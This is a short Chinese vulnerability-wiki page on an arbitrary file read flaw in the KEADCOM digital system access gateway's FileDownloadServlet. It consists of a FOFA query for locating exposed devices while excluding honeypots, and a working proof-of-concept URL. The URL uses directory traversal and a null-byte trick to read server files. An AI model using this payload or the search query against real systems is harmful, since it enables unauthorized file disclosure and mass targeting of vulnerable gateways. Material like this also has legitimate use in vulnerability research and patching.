menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right --Vulnerability-main chevron_right KEADCOM 数字系统接入网关任意文件读取漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    KEADCOM 数字系统接入网关任意文件读取漏洞.md
    540 B / 2021-05-21 09:14:38
        # KEADCOM 数字系统接入网关任意文件读取漏洞


KEADCOM 数字系统接入网关 FileDownloadServlet 存在任意文件读取漏洞,攻击者通过构造请求可以读取服务器任意文件。


fofa:

```
(app="KEDACOM-DVR接入网关") && (is_honeypot=false && is_fraud=false)
```

poc:

```
http://target//gatewayweb/FileDownloadServlet?fileName=pq.txt&filePath=../../../../../../../../../../Windows/System32/drivers/etc/hosts%00.jpg&type=2

```

ref:

https://poc.shuziguanxing.com/#/publicIssueInfo#issueId=3969
    links
    file_download